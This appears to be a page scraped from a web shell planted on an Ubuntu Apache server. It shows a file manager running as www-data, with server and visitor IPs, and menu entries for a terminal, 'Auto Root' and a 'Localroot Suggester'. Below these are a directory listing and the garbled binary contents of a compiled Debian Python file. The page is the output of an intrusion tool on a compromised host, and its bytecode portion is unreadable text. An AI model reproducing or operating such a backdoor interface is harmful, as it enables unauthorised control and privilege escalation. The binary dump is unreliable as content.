Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
python3 /
debpython /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-310.pyc
1.97
KB
-rw-r--r--
2024-08-24 00:51
files.cpython-310.pyc
2.46
KB
-rw-r--r--
2024-08-24 00:51
interpreter.cpython-310.pyc
10.08
KB
-rw-r--r--
2024-08-24 00:51
option.cpython-310.pyc
1019
B
-rw-r--r--
2024-08-24 00:51
version.cpython-310.pyc
12.83
KB
-rw-r--r--
2024-08-24 00:51
Save
Rename
o 年f- � @ s� d dl Z d dlmZmZ d dlmZmZmZ d dlm Z m Z d dlmZ e � e�Zddd�Zdd d �Zdd� Zd d� Zdd� ZdS )� N)�walk�environ)�abspath�isfile�join)�Popen�PIPE)� PUBLIC_DIR_RE�z.pyc c s� � t |�}t| tt f�r| D ]}t|�D ]}|V qqdS t| �r+| �|�r+| V dS tt| ��D ]\}}}|D ] }|�|�rEt||�V q8q1dS )z6Generate *.py file names available in given directory.N) �tuple� isinstance�list�from_directoryr �endswithr r r )�dname� extensions�item�fn�root�dirs� file_names� r �%/usr/share/python3/debpython/files.pyr s"